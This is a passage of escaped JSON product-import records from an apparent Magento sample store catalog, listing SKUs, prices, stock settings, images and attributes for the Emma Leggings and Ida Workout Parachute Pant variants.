onfig_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Red\"},\"1779\":{\"sku\":\"WP02\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Emma Leggings\",\"description\":\"<p>These comfortable and practical leggings pair perfectly with any workout top or casual tee. The Emma\'s subtle contrast fabric and fit ensure you\'re stylish without overdoing it.<\\/p>\\n<p>&bull; Light blue heather yoga pants. <br \\/>&bull; Body hugging fit.<br \\/>&bull; Low rise fit.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Sweatpants,material=Cocona&reg; performance fabric|Organic Cotton,pattern=Solid,climate=Cool|Indoor|Mild|Spring,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP02-28-Blue,size=28,color=Blue|sku=WP02-28-Purple,size=28,color=Purple|sku=WP02-28-Red,size=28,color=Red|sku=WP02-29-Blue,size=29,color=Blue|sku=WP02-29-Purple,size=29,color=Purple|sku=WP02-29-Red,size=29,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp02-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Sweatpants\",\"material\":\"Cocona&reg; performance fabric|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Cool|Indoor|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1780\":{\"sku\":\"WP03-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Ida Workout Parachute Pant-28-Black\",\"description\":\"<p>The Ida Workout Parachute Pant is made of lightweight, super-soft fabric that keeps you comfortable during any level of activity, whether Downward Dog or a few trail miles.<\\/p>\\n<p>&bull; Royal blue parachute pants.<br \\/>&bull; Contrast stripe.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Drawstring closure.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ida-workout-parachute-pant-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1781\":{\"sku\":\"WP03-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Ida Workout Parachute Pant-28-Blue\",\"description\":\"<p>The Ida Workout Parachute Pant is made of lightweight, super-soft fabric that keeps you comfortable during any level of activity, whether Downward Dog or a few trail miles.<\\/p>\\n<p>&bull; Royal blue parachute pants.<br \\/>&bull; Contrast stripe.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Drawstring closure.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ida-workout-parachute-pant-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp03-blue_alt1.jpg,\\/w\\/p\\/wp03-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp03-blue_alt1.jpg,\\/w\\/p\\/wp03-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1782\":{\"sku\":\"WP03-28-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Ida Workout Parachute Pant-28-Purple\",\"description\":\"<p>The Ida Workout Parachute Pant is made of lightweight, super-soft fabric that keeps you comfortable during any level of activity, whether Downward Dog or a few trail miles.<\\/p>\\n<p>&bull; Royal blue parachute pants.<br \\/>&bull; Contrast stripe.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Drawstring closure.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ida-workout-parachute-pant-28-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Purple\"},\"1783\":{\"sku\":\"WP03-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Ida Workout Parachute Pant-29-Black\",\"description\":\"<p>The Ida Workout Parachute Pant is made of lightweight, super-soft fabric that keeps you comfortable during any level of activity, whether Downward Dog or a few trail miles.<\\/p>\\n<p>&bull; Royal blue parachute pants.<br \\/>&bull; Contrast stripe.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Drawstring closure.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ida-workout-parachute-pant-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1784\":{\"sku\":\"WP03-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Ida Workout Parachute Pant-29-Blue\",\"description\":\"<p>The Ida Workout Parachute Pant is made of lightweight, super-soft fabric that keeps you comfortable during any level of activity, whether Downward Dog or a few trail miles.<\\/p>\\n<p>&bull; Royal blue parachute pants.<br \\/>&bull; Contrast stripe.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Drawstring closure.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ida-workout-parachute-pant-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp03-blue_alt1.jpg,\\/w\\/p\\/wp03-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp03-blue_alt1.jpg,\\/w\\/p\\/wp03-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1785\":{\"sku\":\"WP03-29-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Ida Workout Parachute Pant-29-Purple\",\"description\":\"<p>The Ida Workout Parachute Pant is made of lightweight, super-soft fabric that keeps you comfortable during any level of activity, whether Downward Dog or a few trail miles.<\\/p>\\n<p>&bull; Royal blue parachute pants.<br \\/>&bull; Contrast stripe.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Drawstring closure.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ida-workout-parachute-pant-29-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Purple\"},\"1786\":{\"sku\":\"WP03\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Ida Workout Parachute Pant\",\"description\":\"<p>The Ida Workout Parachute Pant is made of lightweight, super-soft fabric that keeps you comfortable during any level of activity, whether Downward Dog or a few trail miles.<\\/p>\\n<p>&bull; Royal blue parachute pants.<br \\/>&bull; Contrast stripe.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Drawstring closure.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Parachute|Track Pants,material=LumaTech&trade;|Nylon|Spandex,pattern=Color-Blocked,climate=Indoor|Hot|Mild|Spring|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP03-28-Black,size=28,color=Black|sku=WP03-28-Blue,size=28,color=Blue|sku=WP03-28-Purple,size=28,color=Purple|sku=WP03-29-Black,size=29,color=Black|sku=WP03-29-Blue,size=29,color=Blue|sku=WP03-29-Purple,size=29,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp03-blue_alt1.jpg,\\/w\\/p\\/wp03-blue_back.jpg\",\"image\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp03-blue_alt1.jpg,\\/w\\/p\\/wp03-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\"